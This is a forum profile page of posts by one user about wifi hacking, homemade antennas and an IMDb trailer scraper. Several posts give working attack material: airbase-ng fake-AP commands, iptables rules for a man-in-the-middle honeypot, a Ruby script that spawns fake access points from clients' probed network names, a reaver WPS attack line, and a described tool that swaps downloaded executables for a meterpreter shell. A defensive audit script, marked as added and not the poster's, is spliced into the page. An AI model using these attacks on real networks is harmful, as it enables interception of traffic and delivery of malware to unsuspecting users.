Posts posted by i8igmac
-
I have destroyed my last wrt54g v6.... I was running some tests without a waterproof setup and now it won't broadcast...
So I have picked up a wrt54g v8 for 5$ WOot. I need to splice the coax to a barrel connector and install ddwrt, then I'll mount one 9dbi alfa antenna on the roof and a 5dbi in our kitchen... repeater (free for life)
So what would you do with a wrt54g?
What have you done?
What firmware would you recommend?
Can I install ruby and airbase-ng?
Antennas you have built?
-
If you have worked out a solution, document your work and write up some clean instructions...
I have never followed any ssd tweaks, I just did a quick install... love the ssd ;-)
-
http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html?m=1
Nice example use of msfcli !
generating a payload and setting up the exploit handler is 2 commands... try the vnc payload :-)
-
netstat -nlp | grep 443
-
Learn how to generate the payload with msfpayload. Then start exploit/multi/handler...
Don't rely on others' scripts.
-
I have not attempted the yagi biquad. I have made the 19 element yagi and was unsatisfied. Each element must be positioned perfectly; if one is out of place then the rest will be useless...
So my idea of a perfect biquad yagi build would have each element sprayed with a metallic paint that is a conductor... stencils could be made for precisely positioned elements on plexiglass...
I still have better success with a parabolic dish and a single biquad for the driven element... I'm sure I could build one to fit in a bag you have picked...
-
If the network does not have internet access, try to DNS spoof all domains and IPs to destination port 80 on the local apache server...
-
I have a droid thunderbolt with a nice extended powercell. The screen is broken so I can't see anything...
My question is, can I root the device with a custom ROM, debian server edition? Then ssh into the device and make good use of its wifi device?
Can this be done without a working screen?
-
Long range biquad. Home build:
I have a few videos on some ddwrt with antenna builds. I used only things around the house. The video above is a biquad in a can and a parabolic dish, HUGE gain from about 1000 feet away, no lag during online gameplay.
It's all about the perfect parabolic dish...
-
iwconfig wlan0 channel 6
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airbase-ng wlan0 -e test-ap-channel-6
New tab in console
airodump-ng wlan0
So we have airodump channel hopping and at the same time airbase is broadcasting a fake ap on channel 6...
On my linux mint everything is working as I need. My goal is to capture all client probe requests with airodump and then start airbase on channel 6 with the newly captured probe requests...
The problem is when I run these same commands above in kali linux. When airodump has your card channel hopping, your same wlan device running airbase is also channel hopping...
Any ideas why linux mint allows me to accomplish this?
-
I had to boot up kali to get a working example of a fake ap with dnsmasq...
Simply follow this tutorial http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html
and don't forget to add iptables to complete your clients' internet connection.
wlan1 has established a connection to my droid hotspot 4g network... at0 traffic will now pass through
iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
-
Maybe some help setting up dhcp. I have nothing but problems with dhcpd3... maybe some simple alternatives.
Laptop has 2 wifi devices. wlan1 is connected to droid 4g 192.168.43.130
wlan0 will be airbase-ng, so should I set ifconfig at0 192.168.44.1 up? Also how would you configure dhcp 192.168.0.100-250???
-
karma was trouble to install on my machine, I didn't feel like booting BT... so here is a fake ap script... it will capture clients' probe requests and start a new essid...
    #start airodump-ng wlan0 -w airbase
    # this will simply scan the airbase.csv file for client probes
    @pid_list=[]
    # this will hold the list of running essids, "netgear", "freewifi", "cisco"
    def refresh_list
      # read the airodump .csv file and sort through clients
      data=File.open("airbase-01.csv","r")
      block=data.read
      cut=block.index("\r\n\r\n")
      block_1=block[146..cut] # here is your list of access points...
      block_2=block[cut+90..-1] # here is your list of clients
      buff=[]
      block_2.each_line{|x| buff<< x.split(",")[5..-1]}
      buff.uniq.each{|x|
        if not x==nil
          x.each{|y|
            if not y.include?(":")
              if not y.include?("(not associated)")
                y.map(&:strip).each{|z|
                  if z.size>=1
                    if not @pid_list.include?(z)
                      Thread.start{system("airbase-ng wlan0 -e \"#{z}\"")}
                      @pid_list<<z
                    end
                  end
                }
              end
            end
          }
        end
      }
    end
    refresh_list
    while true
      sleep 10
      refresh_list
    end
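The same airodump-ng CSV layout the script above reads (AP table, blank line, station table with probed ESSIDs in the trailing columns) can be parsed from the other side to audit which of your own devices are broadcasting saved-network names. This is an added example, not the poster's script; the dump it parses is constructed.

```ruby
# Added example (not the original poster's script): audit an airodump-ng CSV
# for clients that probe for saved-network names. The layout is assumed to be
# the one the post relies on: an AP table, a blank line, then a station table
# whose trailing columns are the probed ESSIDs. The sample dump is constructed.
SAMPLE_CSV = [
  "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key",
  "00:11:22:33:44:55, 2013-07-01 10:00:00, 2013-07-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  100,  0,  0.  0.  0.  0,  6, dd-wrt, ",
  "",
  "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs",
  "AA:BB:CC:DD:EE:01, 2013-07-01 10:01:00, 2013-07-01 10:04:00, -60,  12, 00:11:22:33:44:55, dd-wrt",
  "AA:BB:CC:DD:EE:02, 2013-07-01 10:02:00, 2013-07-01 10:04:30, -70,   3, (not associated) , netgear,freewifi",
  "AA:BB:CC:DD:EE:03, 2013-07-01 10:03:00, 2013-07-01 10:04:30, -75,   1, (not associated) , ",
  ""
].join("\r\n")

# ESSIDs actually beaconed by nearby APs (column 14 of the AP table).
def beaconed_essids(csv)
  aps, _stations = csv.split("\r\n\r\n", 2)
  aps.each_line.drop(1).map { |row| row.split(",")[13].to_s.strip }.reject(&:empty?)
end

# {station_mac => [probed ESSIDs]} from the station table; the BSSID column
# and the "(not associated)" marker are skipped by position, not by content.
def parse_stations(csv)
  _aps, stations = csv.split("\r\n\r\n", 2)
  stations.to_s.each_line.drop(1).each_with_object({}) do |row, out|
    fields = row.split(",").map(&:strip)
    next if fields.size < 6
    out[fields[0]] = fields[6..-1].to_a.reject(&:empty?)
  end
end

# Probed names that no visible AP beacons: these are the saved networks a
# client keeps asking for in the clear, which is exactly what a fake AP
# answers to. Removing stale profiles from those devices closes the exposure.
def leaking_clients(csv)
  visible = beaconed_essids(csv)
  parse_stations(csv).each_with_object({}) do |(mac, names), out|
    leaked = names - visible
    out[mac] = leaked unless leaked.empty?
  end
end

if __FILE__ == $0
  leaking_clients(SAMPLE_CSV).each { |mac, names| puts "#{mac} probes for: #{names.join(', ')}" }
end
```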
-
If I may try...
Think about a walkie talkie. Those hand held radios can change channels by pressing a button...
If you and your friend both have walkie talkies on channel 1 then you can share a conversation...
Your walkie talkie can also channel hop. That could allow you to listen to all conversations on all channels by changing channels quickly.
If you notice when you run airodump, your wifi card is channel hopping, trying to record data on all channels.
I tried :-)
Edit. Misread the question..
-
Very true. browser COOKIE=finger. I guess I was thinking fingerprint of each client lol
if finger.include?("windows")
  s.puts(meterpreter.exe)
end
Just an example, above...
If anyone is interested in a team project, I made this example a few years ago... (I meant to post in community projects....)
All the code is in my head, I have no time to build this.
Packet manipulation is much needed around here
-
Proxy source
http://pastebin.com/n7AHi5Ny
During man in the middle, if a client downloads an executable of any kind... swap that data with meterpreter... I notice people request or ask for this kind of exploit...
Rar, zip, msi, exe etc...
Maybe this community can help me build something from this proof of concept...
-
Deleted sorry.
-
karma is the tool i seek...
-
I have found 1000 most common ssids. And my mistake for saying essids
-
My phone for example will automatically connect to dd-wrt. Can a client's saved access point be guessed?
Airbase-ng wlan0 -e dd-wrt
Is there an essid dictionary file?
Maybe what I am trying to do already exists?
-
From Droid...
There are a few steps you may have to take.
Maybe set uid in the ettercap config.
Enable ip forwarding per iptables or ipchains, os specific.
These 2 above would help you Google search.
Content-length also plays a big part when modding data, always try something simple like replace(poo for pee)
Try several webpages during your test, msn, yahoo etc... Not https...
I have some proof of concept I wrote in ruby: when a user downloads an executable during mitm, the binary data is replaced with a meterpreter shell
-
    #will get trailers....
    #depends on apt-get install rtmpdump and wget
    #set of rules for this to work... the name of the folder must be proper name as listed below, these names are also exact match from imdb
    #/media/500_gig/movies/21 jump street (2012)/movie_file.avi <-------- GOOD
    #/media/500_gig/movies/21_jump_street_xvid_crap/movie_file.avi <--- BAD
    #example
    # ls /media/500_gig/movies/
    # 21 Jump Street (2012)
    # antitrust (2001)
    # Avatar (2009)
    # Basketball diaries (1995)
    # be kind rewind (2008)
    # blank check (1994)
    # blow (2001)
    # buffalo soldiers (2001)
    #run this script from any directory... the destination directory must be changed below
    #sudo ruby get_trailer "movie name (2000)"
Need sudo to write data to hard drive
    require 'socket'
    require 'cgi'
    puts movie_name=ARGV[0]
    dst_dir="/media/6E88F3A627ADD9B7/movies/#{movie_name}/" #- <--------change this
    movie_name=movie_name.gsub(" ","+").chomp
    double_trailer_prevent=0 # set to 1 once the imdb trailer has been fetched
    s=TCPSocket.open("www.imdb.com",80)
    s.print("GET /find?q=#{movie_name} HTTP/1.0\r\n\r\n")
    buff=""
    while line=s.gets
      buff<<line
    end
    s.close
    #gather movie_home link
    buff=buff.gsub('"',"")
    ping=buff.index("/title/")
    if ping==nil
      puts"EXIT: next"
      exit
    else
      movie_home=buff[ping..ping+16] # IFRAME home page / Root page crawl from starting point
      tt=buff[ping+7..ping+15]
    end
    s=TCPSocket.open("www.imdb.com",80)
    buff1=""
    s.print("GET /title/#{tt}/ HTTP/1.0\r\n\r\n")
    while line=s.gets
      buff1<<line
    end
    s.close
    image_link=buff1.scan(/media.rm.*./).to_s[0..26] # media/rm871673856/tt1232829
    rm=buff1.scan(/media.rm.*./).to_s[0..26].scan(/\/.*.\//).to_s
    buff2=""
    s=TCPSocket.open("www.imdb.com",80)
    s.print("GET /media#{rm}#{tt}/ HTTP/1.0\r\n\r\n")
    while line=s.gets
      buff2<<line
    end
    s.close
    if ping=buff1.index("video/imdb/vi")
      double_trailer_prevent=1
      puts trailer_home=buff1[ping..ping+28]
      trailer_home=trailer_home.scan(/video.imdb.vi.*.\//)
      payload="GET /#{trailer_home}player?stop=0 HTTP/1.1
    Host: www.imdb.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Proxy-Connection: keep-alive

    "
      buff3=""
      s=TCPSocket.open("www.imdb.com",80)
      s.print(payload)
      while line=s.recv(5000)
        buff3<<line
        if buff3.include?("</html>")
          break
        end
      end
      s.close
      buff3=buff3.gsub('"',"")
      ping=buff3.index("so.addVariable(file, ")
      pong=buff3.index(");",ping)
      v_file=buff3[ping+21..pong-1]
      v_file=CGI.unescape(v_file)
      if v_file.include?("rtmp")
        ping=buff3.index("so.addVariable(id, ")
        pong=buff3.index(");",ping)
        v_id=buff3[ping+19..pong-1]
        v_id=CGI.unescape(v_id)
        q='"'
        puts"\n"
        system("rtmpdump -r #{q}rtmp://amazonimdb.fcod.llnwd.net/a2643#{q} -a #{q}a2643#{q} -f #{q}LNX 11,2,202,243#{q} -W #{q}http://www.imdb.com/images/js/app/video/mediaplayer.swf#{q} -p #{q}http://www.imdb.com#{q} -y #{q}#{v_id}#{q} -o '#{dst_dir}trailer.flv'")
      end
    end
    if ping=buff1.index("video/screenplay/vi")
      if double_trailer_prevent==1
        puts "double file download attempt"
        exit
      end
      puts trailer_home=buff1[ping..ping+30]
      trailer_home=trailer_home.scan(/video.screenplay.vi.*.\//)
      payload="GET /#{trailer_home}player?stop=0 HTTP/1.1
    Host: www.imdb.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Proxy-Connection: keep-alive

    "
      buff3=""
      s=TCPSocket.open("www.imdb.com",80)
      s.print(payload)
      while line=s.recv(5000)
        buff3<<line
        if buff3.include?("</html>")
          break
        end
      end
      s.close
      buff3=buff3.gsub('"',"")
      ping=buff3.index("so.addVariable(file, ")
      pong=buff3.index(");",ping)
      v_file=buff3[ping+21..pong-1]
      v_file=CGI.unescape(v_file)
      if v_file.include?("http")
        puts"\n"
        system("wget '#{v_file}' -O '#{dst_dir}trailer.flv'")
      end
    end
So, it's ugly... don't judge me... it was successful 95% (wrong name = fail, or trailer does not exist)
There is no error checking... now to process a whole list will take another small script...
irb mode...
    data=`ls /media/500_gig/movies/`
    data.each_line{|movie_name| system("ruby get_trailer.rb '#{movie_name.chomp}'") }
Now I hope to get some help with a template for the site... I just want to scroll through a list of images like netflix... can someone contribute?
I'm very noob with building a webpage... so maybe some decent example code would be appreciated...
-
Droid response,
That is the easy download. I was successful last night with downloading the RTMP stream :-) I got everything in order now, just need to mod my script then launch
-
(first post was from a droid so was quick; now I have an example to share)
I have been using wireshark, tcpick, burp to investigate my way through traffic and this is a working download request... you can try if you like or take my word for it...
    nc progressive.totaleclips.com.edgesuite.net 80 > out.mp4
    GET /127/e12782_301.mp4?eclipId=e12782&bitrateId=471&vendorId=102&type=.mp4&sp_ubid=746-5916787-1173752 HTTP/1.1
    Host: progressive.totaleclips.com.edgesuite.net
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Referer: http://www.imdb.com/images/js/app/video/mediaplayer.swf
(working on some examples for another reply)
Word list help, posted in Questions
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
Try reaver... my first try was a success... you need a decent signal for this attack...
Now for cracking the hash...
Get the big wpa wordlist, I think g0tmilk has download links on his blog... I have seen this work almost every time... must have gpu power... purehate has good tutorials for proper driver installation...